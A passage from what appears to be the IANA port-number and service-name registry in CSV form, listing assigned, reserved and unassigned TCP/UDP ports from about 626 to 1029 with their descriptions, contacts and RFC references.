asia,626,udp,ASIA,[Michael_Dasenbrock],[Michael_Dasenbrock],,,,,, passgo-tivoli,627,tcp,PassGo Tivoli,[John_Rainford_2],[John_Rainford_2],,,,,, passgo-tivoli,627,udp,PassGo Tivoli,[John_Rainford_2],[John_Rainford_2],,,,,, qmqp,628,tcp,QMQP,[Dan_Bernstein_2],[Dan_Bernstein_2],,,,,, qmqp,628,udp,QMQP,[Dan_Bernstein_2],[Dan_Bernstein_2],,,,,, 3com-amp3,629,tcp,3Com AMP3,[Prakash_Banthia],[Prakash_Banthia],,,,,, 3com-amp3,629,udp,3Com AMP3,[Prakash_Banthia],[Prakash_Banthia],,,,,, rda,630,tcp,RDA,[John_Hadjioannou],[John_Hadjioannou],,,,,, rda,630,udp,RDA,[John_Hadjioannou],[John_Hadjioannou],,,,,, ipp,631,tcp,IPP (Internet Printing Protocol),[Carl_Uno_Manros],[Carl_Uno_Manros],,,,,,Defined TXT keys: See BonjourPrinting.pdf. ipp,631,udp,IPP (Internet Printing Protocol),[Carl_Uno_Manros],[Carl_Uno_Manros],,,,,,Defined TXT keys: See BonjourPrinting.pdf. bmpp,632,tcp,bmpp,[Troy_Rollo],[Troy_Rollo],,,,,, bmpp,632,udp,bmpp,[Troy_Rollo],[Troy_Rollo],,,,,, servstat,633,tcp,Service Status update (Sterling Software),[Greg_Rose],[Greg_Rose],,,,,, servstat,633,udp,Service Status update (Sterling Software),[Greg_Rose],[Greg_Rose],,,,,, ginad,634,tcp,ginad,[Mark_Crother],[Mark_Crother],,,,,, ginad,634,udp,ginad,[Mark_Crother],[Mark_Crother],,,,,, rlzdbase,635,tcp,RLZ DBase,[Michael_Ginn],[Michael_Ginn],,,,,, rlzdbase,635,udp,RLZ DBase,[Michael_Ginn],[Michael_Ginn],,,,,, ldaps,636,tcp,ldap protocol over TLS/SSL (was sldap),[Pat_Richard],[Pat_Richard],,,,,, ldaps,636,udp,ldap protocol over TLS/SSL (was sldap),[Pat_Richard],[Pat_Richard],,,,,, lanserver,637,tcp,lanserver,[Chris_Larsson],[Chris_Larsson],,,,,, lanserver,637,udp,lanserver,[Chris_Larsson],[Chris_Larsson],,,,,, mcns-sec,638,tcp,mcns-sec,[Kaz_Ozawa],[Kaz_Ozawa],,,,,, mcns-sec,638,udp,mcns-sec,[Kaz_Ozawa],[Kaz_Ozawa],,,,,, msdp,639,tcp,MSDP,[Dino_Farinacci],[Dino_Farinacci],,,,,, msdp,639,udp,MSDP,[Dino_Farinacci],[Dino_Farinacci],,,,,, entrust-sps,640,tcp,entrust-sps,[Marek_Buchler],[Marek_Buchler],,,,,, entrust-sps,640,udp,entrust-sps,[Marek_Buchler],[Marek_Buchler],,,,,, repcmd,641,tcp,repcmd,[Scott_Dale],[Scott_Dale],,,,,, repcmd,641,udp,repcmd,[Scott_Dale],[Scott_Dale],,,,,, esro-emsdp,642,tcp,ESRO-EMSDP V1.3,[Mohsen_Banan_2],[Mohsen_Banan_2],,,,,, esro-emsdp,642,udp,ESRO-EMSDP V1.3,[Mohsen_Banan_2],[Mohsen_Banan_2],,,,,, sanity,643,tcp,SANity,[Peter_Viscarola],[Peter_Viscarola],,,,,, sanity,643,udp,SANity,[Peter_Viscarola],[Peter_Viscarola],,,,,, dwr,644,tcp,dwr,[Bill_Fenner],[Bill_Fenner],,,,,, dwr,644,udp,dwr,[Bill_Fenner],[Bill_Fenner],,,,,, pssc,645,tcp,PSSC,[Egon_Meier_Engelen],[Egon_Meier_Engelen],,,,,, pssc,645,udp,PSSC,[Egon_Meier_Engelen],[Egon_Meier_Engelen],,,,,, ldp,646,tcp,LDP,[Bob_Thomas],[Bob_Thomas],,,,,, ldp,646,udp,LDP,[Bob_Thomas],[Bob_Thomas],,,,,, dhcp-failover,647,tcp,DHCP Failover,[Bernard_Volz],[Bernard_Volz],,,,,, dhcp-failover,647,udp,DHCP Failover,[Bernard_Volz],[Bernard_Volz],,,,,, rrp,648,tcp,Registry Registrar Protocol (RRP),[Scott_Hollenbeck],[Scott_Hollenbeck],,,,,, rrp,648,udp,Registry Registrar Protocol (RRP),[Scott_Hollenbeck],[Scott_Hollenbeck],,,,,, cadview-3d,649,tcp,Cadview-3d - streaming 3d models over the internet,[David_Cooper],[David_Cooper],,,,,, cadview-3d,649,udp,Cadview-3d - streaming 3d models over the internet,[David_Cooper],[David_Cooper],,,,,, obex,650,tcp,OBEX,[Jeff_Garbers],[Jeff_Garbers],,,,,, obex,650,udp,OBEX,[Jeff_Garbers],[Jeff_Garbers],,,,,, ieee-mms,651,tcp,IEEE MMS,[Curtis_Anderson],[Curtis_Anderson],,,,,, ieee-mms,651,udp,IEEE MMS,[Curtis_Anderson],[Curtis_Anderson],,,,,, hello-port,652,tcp,HELLO_PORT,[Patrick_Cipiere],[Patrick_Cipiere],,,,,, hello-port,652,udp,HELLO_PORT,[Patrick_Cipiere],[Patrick_Cipiere],,,,,, repscmd,653,tcp,RepCmd,[Scott_Dale_2],[Scott_Dale_2],,,,,, repscmd,653,udp,RepCmd,[Scott_Dale_2],[Scott_Dale_2],,,,,, aodv,654,tcp,AODV,[Charles_Perkins],[Charles_Perkins],,,,,, aodv,654,udp,AODV,[Charles_Perkins],[Charles_Perkins],,,,,, tinc,655,tcp,TINC,[Ivo_Timmermans],[Ivo_Timmermans],,,,,, tinc,655,udp,TINC,[Ivo_Timmermans],[Ivo_Timmermans],,,,,, spmp,656,tcp,SPMP,[Jakob_Kaivo],[Jakob_Kaivo],,,,,, spmp,656,udp,SPMP,[Jakob_Kaivo],[Jakob_Kaivo],,,,,, rmc,657,tcp,RMC,[Michael_Schmidt],[Michael_Schmidt],,,,,, rmc,657,udp,RMC,[Michael_Schmidt],[Michael_Schmidt],,,,,, tenfold,658,tcp,TenFold,[Louis_Olszyk],[Louis_Olszyk],,,,,, tenfold,658,udp,TenFold,[Louis_Olszyk],[Louis_Olszyk],,,,,, ,659,,Removed,,,,2001-06-06,,,, mac-srvr-admin,660,tcp,MacOS Server Admin,[Forest_Hill],[Forest_Hill],,,,,, mac-srvr-admin,660,udp,MacOS Server Admin,[Forest_Hill],[Forest_Hill],,,,,, hap,661,tcp,HAP,[Igor_Plotnikov],[Igor_Plotnikov],,,,,, hap,661,udp,HAP,[Igor_Plotnikov],[Igor_Plotnikov],,,,,, pftp,662,tcp,PFTP,[Ben_Schluricke],[Ben_Schluricke],,,,,, pftp,662,udp,PFTP,[Ben_Schluricke],[Ben_Schluricke],,,,,, purenoise,663,tcp,PureNoise,[Sam_Osa],[Sam_Osa],,,,,, purenoise,663,udp,PureNoise,[Sam_Osa],[Sam_Osa],,,,,, oob-ws-https,664,tcp,DMTF out-of-band secure web services management protocol,[Jim_Davis],[Jim_Davis],2007-06,,,,, asf-secure-rmcp,664,udp,ASF Secure Remote Management and Control Protocol,[Carl_First],[Carl_First],,,,,, sun-dr,665,tcp,Sun DR,[Harinder_Bhasin],[Harinder_Bhasin],,,,,, sun-dr,665,udp,Sun DR,[Harinder_Bhasin],[Harinder_Bhasin],,,,,, mdqs,666,tcp,,,,,,,,, mdqs,666,udp,,,,,,,,, doom,666,tcp,doom Id Software,[ddt],[ddt],,,,,, doom,666,udp,doom Id Software,[ddt],[ddt],,,,,, disclose,667,tcp,campaign contribution disclosures - SDR Technologies,[Jim_Dixon],[Jim_Dixon],,,,,, disclose,667,udp,campaign contribution disclosures - SDR Technologies,[Jim_Dixon],[Jim_Dixon],,,,,, mecomm,668,tcp,MeComm,,,,,,,, mecomm,668,udp,MeComm,,,,,,,, meregister,669,tcp,MeRegister,[Armin_Sawusch],[Armin_Sawusch],,,,,, meregister,669,udp,MeRegister,[Armin_Sawusch],[Armin_Sawusch],,,,,, vacdsm-sws,670,tcp,VACDSM-SWS,,,,,,,, vacdsm-sws,670,udp,VACDSM-SWS,,,,,,,, vacdsm-app,671,tcp,VACDSM-APP,,,,,,,, vacdsm-app,671,udp,VACDSM-APP,,,,,,,, vpps-qua,672,tcp,VPPS-QUA,,,,,,,, vpps-qua,672,udp,VPPS-QUA,,,,,,,, cimplex,673,tcp,CIMPLEX,[Ulysses_G_Smith_Jr],[Ulysses_G_Smith_Jr],,,,,, cimplex,673,udp,CIMPLEX,[Ulysses_G_Smith_Jr],[Ulysses_G_Smith_Jr],,,,,, acap,674,tcp,ACAP,[Chris_Newman],[Chris_Newman],,2010-10-15,,,, acap,674,udp,ACAP,[Chris_Newman],[Chris_Newman],,2010-10-15,,,, dctp,675,tcp,DCTP,[Andre_Kramer],[Andre_Kramer],,,,,, dctp,675,udp,DCTP,[Andre_Kramer],[Andre_Kramer],,,,,, vpps-via,676,tcp,VPPS Via,[Ulysses_G_Smith_Jr],[Ulysses_G_Smith_Jr],,,,,, vpps-via,676,udp,VPPS Via,[Ulysses_G_Smith_Jr],[Ulysses_G_Smith_Jr],,,,,, vpp,677,tcp,Virtual Presence Protocol,[Klaus_Wolf],[Klaus_Wolf],,,,,, vpp,677,udp,Virtual Presence Protocol,[Klaus_Wolf],[Klaus_Wolf],,,,,, ggf-ncp,678,tcp,GNU Generation Foundation NCP,[Noah_Paul],[Noah_Paul],,,,,, ggf-ncp,678,udp,GNU Generation Foundation NCP,[Noah_Paul],[Noah_Paul],,,,,, mrm,679,tcp,MRM,[Liming_Wei],[Liming_Wei],,,,,, mrm,679,udp,MRM,[Liming_Wei],[Liming_Wei],,,,,, entrust-aaas,680,tcp,entrust-aaas,,,,,,,, entrust-aaas,680,udp,entrust-aaas,,,,,,,, entrust-aams,681,tcp,entrust-aams,[Adrian_Mancini],[Adrian_Mancini],,,,,, entrust-aams,681,udp,entrust-aams,[Adrian_Mancini],[Adrian_Mancini],,,,,, xfr,682,tcp,XFR,[Noah_Paul_2],[Noah_Paul_2],,,,,, xfr,682,udp,XFR,[Noah_Paul_2],[Noah_Paul_2],,,,,, corba-iiop,683,tcp,CORBA IIOP,,,,,,,, corba-iiop,683,udp,CORBA IIOP,,,,,,,, corba-iiop-ssl,684,tcp,CORBA IIOP SSL,[Andrew_Watson],[Andrew_Watson],,,,,, corba-iiop-ssl,684,udp,CORBA IIOP SSL,[Andrew_Watson],[Andrew_Watson],,,,,, mdc-portmapper,685,tcp,MDC Port Mapper,[Noah_Paul],[Noah_Paul],,,,,, mdc-portmapper,685,udp,MDC Port Mapper,[Noah_Paul],[Noah_Paul],,,,,, hcp-wismar,686,tcp,Hardware Control Protocol Wismar,[David_Merchant],[David_Merchant],,,,,, hcp-wismar,686,udp,Hardware Control Protocol Wismar,[David_Merchant],[David_Merchant],,,,,, asipregistry,687,tcp,asipregistry,[Erik_Sea],[Erik_Sea],,,,,, asipregistry,687,udp,asipregistry,[Erik_Sea],[Erik_Sea],,,,,, realm-rusd,688,tcp,ApplianceWare managment protocol,[Stacy_Kenworthy],[Stacy_Kenworthy],,,,,, realm-rusd,688,udp,ApplianceWare managment protocol,[Stacy_Kenworthy],[Stacy_Kenworthy],,,,,, nmap,689,tcp,NMAP,[Peter_Dennis_Bartok],[Peter_Dennis_Bartok],,,,,, nmap,689,udp,NMAP,[Peter_Dennis_Bartok],[Peter_Dennis_Bartok],,,,,, vatp,690,tcp,Velazquez Application Transfer Protocol,[Velneo],[Velneo],,,,,, vatp,690,udp,Velazquez Application Transfer Protocol,[Velneo],[Velneo],,,,,, msexch-routing,691,tcp,MS Exchange Routing,[David_Lemson],[David_Lemson],,,,,, msexch-routing,691,udp,MS Exchange Routing,[David_Lemson],[David_Lemson],,,,,, hyperwave-isp,692,tcp,Hyperwave-ISP,[Gerald_Mesaric],[Gerald_Mesaric],,,,,, hyperwave-isp,692,udp,Hyperwave-ISP,[Gerald_Mesaric],[Gerald_Mesaric],,,,,, connendp,693,tcp,almanid Connection Endpoint,[Ronny_Bremer],[Ronny_Bremer],,,,,, connendp,693,udp,almanid Connection Endpoint,[Ronny_Bremer],[Ronny_Bremer],,,,,, ha-cluster,694,tcp,ha-cluster,[Alan_Robertson],[Alan_Robertson],,,,,, ha-cluster,694,udp,ha-cluster,[Alan_Robertson],[Alan_Robertson],,,,,, ieee-mms-ssl,695,tcp,IEEE-MMS-SSL,[Curtis_Anderson_2],[Curtis_Anderson_2],,,,,, ieee-mms-ssl,695,udp,IEEE-MMS-SSL,[Curtis_Anderson_2],[Curtis_Anderson_2],,,,,, rushd,696,tcp,RUSHD,[Greg_Ercolano],[Greg_Ercolano],,,,,, rushd,696,udp,RUSHD,[Greg_Ercolano],[Greg_Ercolano],,,,,, uuidgen,697,tcp,UUIDGEN,[James_Falkner],[James_Falkner],,,,,, uuidgen,697,udp,UUIDGEN,[James_Falkner],[James_Falkner],,,,,, olsr,698,tcp,OLSR,[Thomas_Clausen],[Thomas_Clausen],,,,,, olsr,698,udp,OLSR,[Thomas_Clausen],[Thomas_Clausen],,,,,, accessnetwork,699,tcp,Access Network,[Yingchun_Xu],[Yingchun_Xu],,,,,, accessnetwork,699,udp,Access Network,[Yingchun_Xu],[Yingchun_Xu],,,,,, epp,700,tcp,Extensible Provisioning Protocol,,,,,[RFC5734],,, epp,700,udp,Extensible Provisioning Protocol,,,,,[RFC5734],,, lmp,701,tcp,Link Management Protocol (LMP),,,,,[RFC4204],,, lmp,701,udp,Link Management Protocol (LMP),,,,,[RFC4204],,, iris-beep,702,tcp,IRIS over BEEP,,,,,[RFC3983],,, iris-beep,702,udp,IRIS over BEEP,,,,,[RFC3983],,, ,703,,Unassigned,,,,,,,, elcsd,704,tcp,errlog copy/server daemon,,,,,,,, elcsd,704,udp,errlog copy/server daemon,,,,,,,, agentx,705,tcp,AgentX,[Bob_Natale],[Bob_Natale],,,,,, agentx,705,udp,AgentX,[Bob_Natale],[Bob_Natale],,,,,, silc,706,tcp,SILC,[Pekka_Riikonen],[Pekka_Riikonen],,,,,, silc,706,udp,SILC,[Pekka_Riikonen],[Pekka_Riikonen],,,,,, borland-dsj,707,tcp,Borland DSJ,[Gerg_Cole],[Gerg_Cole],,,,,, borland-dsj,707,udp,Borland DSJ,[Gerg_Cole],[Gerg_Cole],,,,,, ,708,,Unassigned,,,,,,,, entrust-kmsh,709,tcp,Entrust Key Management Service Handler,,,,,,,, entrust-kmsh,709,udp,Entrust Key Management Service Handler,,,,,,,, entrust-ash,710,tcp,Entrust Administration Service Handler,[Peter_Whittaker],[Peter_Whittaker],,,,,, entrust-ash,710,udp,Entrust Administration Service Handler,[Peter_Whittaker],[Peter_Whittaker],,,,,, cisco-tdp,711,tcp,Cisco TDP,[Bruce_Davie],[Bruce_Davie],,,,,, cisco-tdp,711,udp,Cisco TDP,[Bruce_Davie],[Bruce_Davie],,,,,, tbrpf,712,tcp,TBRPF,,,,,[RFC3684],,, tbrpf,712,udp,TBRPF,,,,,[RFC3684],,, iris-xpc,713,tcp,IRIS over XPC,,,,,,,, iris-xpc,713,udp,IRIS over XPC,,,,,,,, iris-xpcs,714,tcp,IRIS over XPCS,,,,,[RFC4992],,, iris-xpcs,714,udp,IRIS over XPCS,,,,,[RFC4992],,, iris-lwz,715,tcp,IRIS-LWZ,,,,,[RFC4993],,, iris-lwz,715,udp,IRIS-LWZ,,,,,[RFC4993],,, pana,716,udp,PANA Messages,,,,,[RFC5191],,, ,717-728,,Unassigned,,,,,,,, netviewdm1,729,tcp,IBM NetView DM/6000 Server/Client,,,,,,,, netviewdm1,729,udp,IBM NetView DM/6000 Server/Client,,,,,,,, netviewdm2,730,tcp,IBM NetView DM/6000 send/tcp,,,,,,,, netviewdm2,730,udp,IBM NetView DM/6000 send/tcp,,,,,,,, netviewdm3,731,tcp,IBM NetView DM/6000 receive/tcp,[Philippe_Binet],[Philippe_Binet],,,,,, netviewdm3,731,udp,IBM NetView DM/6000 receive/tcp,[Philippe_Binet],[Philippe_Binet],,,,,, ,732-740,,Unassigned,,,,,,,, netgw,741,tcp,netGW,[Oliver_Korfmacher],[Oliver_Korfmacher],,,,,, netgw,741,udp,netGW,[Oliver_Korfmacher],[Oliver_Korfmacher],,,,,, netrcs,742,tcp,Network based Rev. Cont. Sys.,[Gordon_C_Galligher],[Gordon_C_Galligher],,,,,, netrcs,742,udp,Network based Rev. Cont. Sys.,[Gordon_C_Galligher],[Gordon_C_Galligher],,,,,, ,743,,Unassigned,,,,,,,, flexlm,744,tcp,Flexible License Manager,[Matt_Christiano],[Matt_Christiano],,,,,, flexlm,744,udp,Flexible License Manager,[Matt_Christiano],[Matt_Christiano],,,,,, ,745-746,,Unassigned,,,,,,,, fujitsu-dev,747,tcp,Fujitsu Device Control,,,,,,,, fujitsu-dev,747,udp,Fujitsu Device Control,,,,,,,, ris-cm,748,tcp,Russell Info Sci Calendar Manager,,,,,,,, ris-cm,748,udp,Russell Info Sci Calendar Manager,,,,,,,, kerberos-adm,749,tcp,kerberos administration,,,,,,,, kerberos-adm,749,udp,kerberos administration,,,,,,,, rfile,750,tcp,,,,,,,,, loadav,750,udp,,,,,,,,, kerberos-iv,750,udp,kerberos version iv,[Martin_Hamilton],[Martin_Hamilton],,,,,, pump,751,tcp,,,,,,,,, pump,751,udp,,,,,,,,, qrh,752,tcp,,,,,,,,, qrh,752,udp,,,,,,,,, rrh,753,tcp,,,,,,,,, rrh,753,udp,,,,,,,,, tell,754,tcp,send,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, tell,754,udp,send,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, ,755-756,,Unassigned,,,,,,,, nlogin,758,tcp,,,,,,,,, nlogin,758,udp,,,,,,,,, con,759,tcp,,,,,,,,, con,759,udp,,,,,,,,, ns,760,tcp,,,,,,,,, ns,760,udp,,,,,,,,, rxe,761,tcp,,,,,,,,, rxe,761,udp,,,,,,,,, quotad,762,tcp,,,,,,,,, quotad,762,udp,,,,,,,,, cycleserv,763,tcp,,,,,,,,, cycleserv,763,udp,,,,,,,,, omserv,764,tcp,,,,,,,,, omserv,764,udp,,,,,,,,, webster,765,tcp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, webster,765,udp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, ,766,,Unassigned,,,,,,,, phonebook,767,tcp,phone,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, phonebook,767,udp,phone,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, ,768,,Unassigned,,,,,,,, vid,769,tcp,,,,,,,,, vid,769,udp,,,,,,,,, cadlock,770,tcp,,,,,,,,, cadlock,770,udp,,,,,,,,, rtip,771,tcp,,,,,,,,, rtip,771,udp,,,,,,,,, cycleserv2,772,tcp,,,,,,,,, cycleserv2,772,udp,,,,,,,,, submit,773,tcp,,,,,,,,, notify,773,udp,,,,,,,,, rpasswd,774,tcp,,,,,,,,, acmaint-dbd,774,udp,"IANA assigned this well-formed service name as a replacement for ""acmaint_dbd"".",,,,,,,, acmaint_dbd,774,udp,,,,,,,,,"This entry is an alias to ""acmaint-dbd"". This entry is now historic, not usable for use with many common service discovery mechanisms." entomb,775,tcp,,,,,,,,, acmaint-transd,775,udp,"IANA assigned this well-formed service name as a replacement for ""acmaint_transd"".",,,,,,,, acmaint_transd,775,udp,,,,,,,,,"This entry is an alias to ""acmaint-transd"". This entry is now historic, not usable for use with many common service discovery mechanisms." wpages,776,tcp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, wpages,776,udp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, multiling-http,777,tcp,Multiling HTTP,[Alejandro_Bonet],[Alejandro_Bonet],,,,,, multiling-http,777,udp,Multiling HTTP,[Alejandro_Bonet],[Alejandro_Bonet],,,,,, ,778-779,,Unassigned,,,,,,,, wpgs,780,tcp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, wpgs,780,udp,,[Josyula_R_Rao],[Josyula_R_Rao],,,,,, ,781-785,,Unassigned,,,,,,,, ,786,,Unassigned,,,,2002-05-08,,,, ,787,,Unassigned,,,,2002-10-08,,,, ,788-799,,Unassigned,,,,,,,Unauthorized Use Known on port 796, mdbs-daemon,800,tcp,"IANA assigned this well-formed service name as a replacement for ""mdbs_daemon"".",,,,,,,, mdbs_daemon,800,tcp,,,,,,,,,"This entry is an alias to ""mdbs-daemon"". This entry is now historic, not usable for use with many common service discovery mechanisms." mdbs-daemon,800,udp,"IANA assigned this well-formed service name as a replacement for ""mdbs_daemon"".",,,,,,,, mdbs_daemon,800,udp,,,,,,,,,"This entry is an alias to ""mdbs-daemon"". This entry is now historic, not usable for use with many common service discovery mechanisms." device,801,tcp,,,,,,,,, device,801,udp,,,,,,,,, mbap-s,802,tcp,Modbus Application Protocol Secure,[modbus.org],[Dennis_Dube],2014-06-10,,,,, mbap-s,802,udp,Modbus Application Protocol Secure,[modbus.org],[Dennis_Dube],2014-06-10,,,,, ,803-809,,Unassigned,,,,,,,, fcp-udp,810,tcp,FCP,[Paul_Whittemore],[Paul_Whittemore],,,,,, fcp-udp,810,udp,FCP Datagram,[Paul_Whittemore],[Paul_Whittemore],,,,,, ,811-827,,Unassigned,,,,,,,, itm-mcell-s,828,tcp,itm-mcell-s,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, itm-mcell-s,828,udp,itm-mcell-s,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, pkix-3-ca-ra,829,tcp,PKIX-3 CA/RA,[Carlisle_Adams],[Carlisle_Adams],,,,,, pkix-3-ca-ra,829,udp,PKIX-3 CA/RA,[Carlisle_Adams],[Carlisle_Adams],,,,,, netconf-ssh,830,tcp,NETCONF over SSH,,,,,[RFC6242],,, netconf-ssh,830,udp,NETCONF over SSH,,,,,[RFC6242],,, netconf-beep,831,tcp,NETCONF over BEEP,,,,,[RFC4744],,, netconf-beep,831,udp,NETCONF over BEEP,,,,,[RFC4744],,, netconfsoaphttp,832,tcp,NETCONF for SOAP over HTTPS,,,,,[RFC4743],,, netconfsoaphttp,832,udp,NETCONF for SOAP over HTTPS,,,,,[RFC4743],,, netconfsoapbeep,833,tcp,NETCONF for SOAP over BEEP,,,,,[RFC4743],,, netconfsoapbeep,833,udp,NETCONF for SOAP over BEEP,,,,,[RFC4743],,, ,834-846,,Unassigned,,,,,,,, dhcp-failover2,847,tcp,dhcp-failover 2,[Bernard_Volz],[Bernard_Volz],,,,,, dhcp-failover2,847,udp,dhcp-failover 2,[Bernard_Volz],[Bernard_Volz],,,,,, gdoi,848,tcp,GDOI,,,,,[RFC3547],,, gdoi,848,udp,GDOI,,,,,[RFC3547],,, ,849-859,,Unassigned,,,,,,,, iscsi,860,tcp,iSCSI,[IESG],[IETF_Chair],,2013-08-27,[RFC7143],,, iscsi,860,udp,iSCSI,[IESG],[IETF_Chair],,2013-08-27,[RFC7143],,, owamp-control,861,tcp,OWAMP-Control,,,,,[RFC4656],,, owamp-control,861,udp,OWAMP-Control,,,,,[RFC4656],,, twamp-control,862,tcp,Two-way Active Measurement Protocol (TWAMP) Control,,,,,[RFC5357],,, twamp-control,862,udp,Two-way Active Measurement Protocol (TWAMP) Control,,,,,[RFC5357],,, ,863-872,,Unassigned,,,,,,,, rsync,873,tcp,rsync,[Andrew_Tridgell],[Andrew_Tridgell],,,,,, rsync,873,udp,rsync,[Andrew_Tridgell],[Andrew_Tridgell],,,,,, ,874-885,,Unassigned,,,,,,,, iclcnet-locate,886,tcp,ICL coNETion locate server,[Bob_Lyon],[Bob_Lyon],,,,,, iclcnet-locate,886,udp,ICL coNETion locate server,[Bob_Lyon],[Bob_Lyon],,,,,, iclcnet-svinfo,887,tcp,"ICL coNETion server info IANA assigned this well-formed service name as a replacement for ""iclcnet_svinfo"".",[Bob_Lyon],[Bob_Lyon],,,,,, iclcnet_svinfo,887,tcp,ICL coNETion server info,[Bob_Lyon],[Bob_Lyon],,,,,,"This entry is an alias to ""iclcnet-svinfo"". This entry is now historic, not usable for use with many common service discovery mechanisms." iclcnet-svinfo,887,udp,"ICL coNETion server info IANA assigned this well-formed service name as a replacement for ""iclcnet_svinfo"".",[Bob_Lyon],[Bob_Lyon],,,,,, iclcnet_svinfo,887,udp,ICL coNETion server info,[Bob_Lyon],[Bob_Lyon],,,,,,"This entry is an alias to ""iclcnet-svinfo"". This entry is now historic, not usable for use with many common service discovery mechanisms." accessbuilder,888,tcp,AccessBuilder,[Steve_Sweeney],[Steve_Sweeney],,,,,, accessbuilder,888,udp,AccessBuilder,[Steve_Sweeney],[Steve_Sweeney],,,,,, cddbp,888,tcp,CD Database Protocol,[Steve_Scherf],[Steve_Scherf],,,,,,This entry records an unassigned but widespread use ,889-899,,Unassigned,,,,,,,, omginitialrefs,900,tcp,OMG Initial Refs,[Christian_Callsen],[Christian_Callsen],,,,,, omginitialrefs,900,udp,OMG Initial Refs,[Christian_Callsen],[Christian_Callsen],,,,,, smpnameres,901,tcp,SMPNAMERES,[Leif_Ekblad],[Leif_Ekblad],,,,,, smpnameres,901,udp,SMPNAMERES,[Leif_Ekblad],[Leif_Ekblad],,,,,, ideafarm-door,902,tcp,self documenting Telnet Door,,,,,,,, ideafarm-door,902,udp,self documenting Door: send 0x00 for info,,,,,,,, ideafarm-panic,903,tcp,self documenting Telnet Panic Door,[Wo_o_Ideafarm],[Wo_o_Ideafarm],,,,,, ideafarm-panic,903,udp,self documenting Panic Door: send 0x00 for info,[Wo_o_Ideafarm],[Wo_o_Ideafarm],,,,,, ,904-909,,Unassigned,,,,,,,, kink,910,tcp,Kerberized Internet Negotiation of Keys (KINK),,,,,[RFC4430],,, kink,910,udp,Kerberized Internet Negotiation of Keys (KINK),,,,,[RFC4430],,, xact-backup,911,tcp,xact-backup,[Bill_Carroll],[Bill_Carroll],,,,,, xact-backup,911,udp,xact-backup,[Bill_Carroll],[Bill_Carroll],,,,,, apex-mesh,912,tcp,APEX relay-relay service,,,,,,,, apex-mesh,912,udp,APEX relay-relay service,,,,,,,, apex-edge,913,tcp,APEX endpoint-relay service,,,,,[RFC3340],,, apex-edge,913,udp,APEX endpoint-relay service,,,,,[RFC3340],,, ,914-988,,Unassigned,,,,,,,, ftps-data,989,tcp,"ftp protocol, data, over TLS/SSL",,,,,,,, ftps-data,989,udp,"ftp protocol, data, over TLS/SSL",,,,,,,, ftps,990,tcp,"ftp protocol, control, over TLS/SSL",[Christopher_Allen],[Christopher_Allen],,,,,, ftps,990,udp,"ftp protocol, control, over TLS/SSL",[Christopher_Allen],[Christopher_Allen],,,,,, nas,991,tcp,Netnews Administration System,[Vera_Heinau][Heiko_Schlichting],[Vera_Heinau][Heiko_Schlichting],,,,,, nas,991,udp,Netnews Administration System,[Vera_Heinau][Heiko_Schlichting],[Vera_Heinau][Heiko_Schlichting],,,,,, telnets,992,tcp,telnet protocol over TLS/SSL,,,,,,,, telnets,992,udp,telnet protocol over TLS/SSL,,,,,,,, imaps,993,tcp,imap4 protocol over TLS/SSL,,,,,,,, imaps,993,udp,imap4 protocol over TLS/SSL,,,,,,,, ,994,tcp,Reserved,,,,2011-08-31,,,,(previous contact was[Christopher_Allen]) ,994,udp,Reserved,,,,,,,, pop3s,995,tcp,pop3 protocol over TLS/SSL (was spop3),[Gordon_Mangione],[Gordon_Mangione],,,,,, pop3s,995,udp,pop3 protocol over TLS/SSL (was spop3),[Gordon_Mangione],[Gordon_Mangione],,,,,, vsinet,996,tcp,vsinet,[Rob_Juergens],[Rob_Juergens],,,,,, vsinet,996,udp,vsinet,[Rob_Juergens],[Rob_Juergens],,,,,, maitrd,997,tcp,,,,,,,,, maitrd,997,udp,,,,,,,,, busboy,998,tcp,,,,,,,,, puparp,998,udp,,,,,,,,, garcon,999,tcp,,,,,,,,, applix,999,udp,Applix ac,,,,,,,, puprouter,999,tcp,,,,,,,,, puprouter,999,udp,,,,,,,,, cadlock2,1000,tcp,,,,,,,,, cadlock2,1000,udp,,,,,,,,, ,1001-1009,,Unassigned,,,,,,,, ,1008,udp,Possibly used by Sun Solaris????,,,,,,,, surf,1010,tcp,surf,[Joseph_Geer],[Joseph_Geer],,,,,, surf,1010,udp,surf,[Joseph_Geer],[Joseph_Geer],,,,,, ,1011-1020,,Reserved,,,,,,,, exp1,1021,tcp,RFC3692-style Experiment 1,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp1,1021,udp,RFC3692-style Experiment 1,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp1,1021,sctp,RFC3692-style Experiment 1,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp1,1021,dccp,RFC3692-style Experiment 1,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp2,1022,tcp,RFC3692-style Experiment 2,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp2,1022,udp,RFC3692-style Experiment 2,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp2,1022,sctp,RFC3692-style Experiment 2,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, exp2,1022,dccp,RFC3692-style Experiment 2,[IESG],[IETF_Chair],,,[1][RFC4727][RFC6335],,, ,1023,tcp,Reserved,[IANA],[IANA],,,,,, ,1023,udp,Reserved,[IANA],[IANA],,,,,, ,1024,tcp,Reserved,[IANA],[IANA],,,,,, ,1024,udp,Reserved,[IANA],[IANA],,,,,, blackjack,1025,tcp,network blackjack,,,,,,,, blackjack,1025,udp,network blackjack,,,,,,,, cap,1026,tcp,Calendar Access Protocol,[Doug_Royer],[Doug_Royer],2010-12-09,,,,, cap,1026,udp,Calendar Access Protocol,[Doug_Royer],[Doug_Royer],2010-12-09,,,,, 6a44,1027,udp,IPv6 Behind NAT44 CPEs,[IESG],[IETF_Chair],2012-08-02,,[RFC6751],,, ,1027,tcp,Reserved,,,,,,,, ,1028,,Deprecated,,,,2004-02,,,, solid-mux,1029,tcp,Solid Mux Server,[Anders_Borg],[Anders_Borg],2004-11,,,,, solid-mux,1029,udp,Solid Mux 